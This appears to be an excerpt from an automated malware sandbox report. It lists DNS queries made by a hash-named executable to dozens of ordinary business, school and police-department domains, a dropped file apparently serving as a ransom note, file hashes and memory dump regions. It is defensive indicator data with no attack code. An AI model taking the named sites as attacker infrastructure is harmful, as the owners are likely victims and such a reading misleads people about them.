    • 8.8.8.8:53
      185.75.67.172.in-addr.arpa
      dns
      72 B
      134 B
      1
      1

      DNS Request

      185.75.67.172.in-addr.arpa

    • 8.8.8.8:53
      92.118.215.35.in-addr.arpa
      dns
      72 B
      124 B
      1
      1

      DNS Request

      92.118.215.35.in-addr.arpa

    • 8.8.8.8:53
      dupontsellshomes.com
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      66 B
      82 B
      1
      1

      DNS Request

      dupontsellshomes.com

      DNS Response

      70.40.220.182

    • 8.8.8.8:53
      braffinjurylawfirm.com
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      68 B
      100 B
      1
      1

      DNS Request

      braffinjurylawfirm.com

      DNS Response

      104.21.95.31
      172.67.142.162

    • 8.8.8.8:53
      182.220.40.70.in-addr.arpa
      dns
      72 B
      106 B
      1
      1

      DNS Request

      182.220.40.70.in-addr.arpa

    • 8.8.8.8:53
      31.95.21.104.in-addr.arpa
      dns
      71 B
      133 B
      1
      1

      DNS Request

      31.95.21.104.in-addr.arpa

    • 8.8.8.8:53
      xtptrack.com
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      58 B
      74 B
      1
      1

      DNS Request

      xtptrack.com

      DNS Response

      35.190.31.54

    • 8.8.8.8:53
      www.xtptrack.com
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      62 B
      78 B
      1
      1

      DNS Request

      www.xtptrack.com

      DNS Response

      34.120.190.48

    • 8.8.8.8:53
      54.31.190.35.in-addr.arpa
      dns
      71 B
      122 B
      1
      1

      DNS Request

      54.31.190.35.in-addr.arpa

    • 8.8.8.8:53
      gemeentehetkompas.nl
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      66 B
      137 B
      1
      1

      DNS Request

      gemeentehetkompas.nl

    • 8.8.8.8:53
      alsace-first.com
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      124 B
      156 B
      2
      2

      DNS Request

      alsace-first.com

      DNS Request

      alsace-first.com

      DNS Response

      213.186.33.4

      DNS Response

      213.186.33.4

    • 8.8.8.8:53
      48.190.120.34.in-addr.arpa
      dns
      72 B
      124 B
      1
      1

      DNS Request

      48.190.120.34.in-addr.arpa

    • 8.8.8.8:53
      4.33.186.213.in-addr.arpa
      dns
      71 B
      103 B
      1
      1

      DNS Request

      4.33.186.213.in-addr.arpa

    • 8.8.8.8:53
      woodleyacademy.org
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      64 B
      80 B
      1
      1

      DNS Request

      woodleyacademy.org

      DNS Response

      208.95.242.12

    • 8.8.8.8:53
      12.242.95.208.in-addr.arpa
      dns
      144 B
      100 B
      2
      1

      DNS Request

      12.242.95.208.in-addr.arpa

      DNS Request

      12.242.95.208.in-addr.arpa

    • 8.8.8.8:53
      sportsmassoren.com
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      64 B
      80 B
      1
      1

      DNS Request

      sportsmassoren.com

      DNS Response

      94.231.106.24

    • 8.8.8.8:53
      olejuulsmuskelterapi.dk
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      138 B
      170 B
      2
      2

      DNS Request

      olejuulsmuskelterapi.dk

      DNS Request

      olejuulsmuskelterapi.dk

      DNS Response

      185.21.41.131

      DNS Response

      185.21.41.131

    • 8.8.8.8:53
      24.106.231.94.in-addr.arpa
      dns
      144 B
      210 B
      2
      2

      DNS Request

      24.106.231.94.in-addr.arpa

      DNS Request

      24.106.231.94.in-addr.arpa

    • 8.8.8.8:53
      131.41.21.185.in-addr.arpa
      dns
      144 B
      208 B
      2
      2

      DNS Request

      131.41.21.185.in-addr.arpa

      DNS Request

      131.41.21.185.in-addr.arpa

    • 8.8.8.8:53
      vyhino-zhulebino-24.ru
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      68 B
      129 B
      1
      1

      DNS Request

      vyhino-zhulebino-24.ru

    • 8.8.8.8:53
      torgbodenbollnas.se
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      130 B
      162 B
      2
      2

      DNS Request

      torgbodenbollnas.se

      DNS Request

      torgbodenbollnas.se

      DNS Response

      46.30.211.38

      DNS Response

      46.30.211.38

    • 8.8.8.8:53
      ora-it.de
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      55 B
      71 B
      1
      1

      DNS Request

      ora-it.de

      DNS Response

      176.28.10.103

    • 8.8.8.8:53
      www.ora-it.de
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      118 B
      178 B
      2
      2

      DNS Request

      www.ora-it.de

      DNS Request

      www.ora-it.de

      DNS Response

      176.28.10.103

      DNS Response

      176.28.10.103

    • 8.8.8.8:53
      38.211.30.46.in-addr.arpa
      dns
      71 B
      107 B
      1
      1

      DNS Request

      38.211.30.46.in-addr.arpa

    • 8.8.8.8:53
      103.10.28.176.in-addr.arpa
      dns
      144 B
      208 B
      2
      2

      DNS Request

      103.10.28.176.in-addr.arpa

      DNS Request

      103.10.28.176.in-addr.arpa

    • 8.8.8.8:53
      digi-talents.com
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      124 B
      156 B
      2
      2

      DNS Request

      digi-talents.com

      DNS Request

      digi-talents.com

      DNS Response

      46.226.40.217

      DNS Response

      46.226.40.217

    • 8.8.8.8:53
      chandlerpd.com
      dns
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      120 B
      152 B
      2
      2

      DNS Request

      chandlerpd.com

      DNS Request

      chandlerpd.com

      DNS Response

      216.40.34.41

      DNS Response

      216.40.34.41

    • 8.8.8.8:53
      217.40.226.46.in-addr.arpa
      dns
      144 B
      260 B
      2
      2

      DNS Request

      217.40.226.46.in-addr.arpa

      DNS Request

      217.40.226.46.in-addr.arpa

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\Recovery\wpq2m-readme.txt

      Filesize

      6KB

      MD5

      b65f51bad8626853934a0518c548a43f

      SHA1

      ddcc3441140e30c9d8441993450205f6db92a537

      SHA256

      8f5e216586c699436f0a0f8c09a57745a0345bc942129db3edfc618f32c0e80f

      SHA512

      b0b613d964cf9ce1d4148247920e7ecedf5f6c65c8c6fe3066146d9dfb2c7083411a7b9287f2190c8e7bf39daac02f2355c47ff5975f40ead1dca521429ea7e2

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ftzc4am2.qz5.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/4824-0-0x000002A9E66E0000-0x000002A9E6702000-memory.dmp

      Filesize

      136KB

    • memory/4824-10-0x00007FFFB7AB0000-0x00007FFFB8571000-memory.dmp

      Filesize

      10.8MB

    • memory/4824-11-0x000002A9FEB10000-0x000002A9FEB20000-memory.dmp

      Filesize

      64KB

    • memory/4824-14-0x00007FFFB7AB0000-0x00007FFFB8571000-memory.dmp

      Filesize

      10.8MB
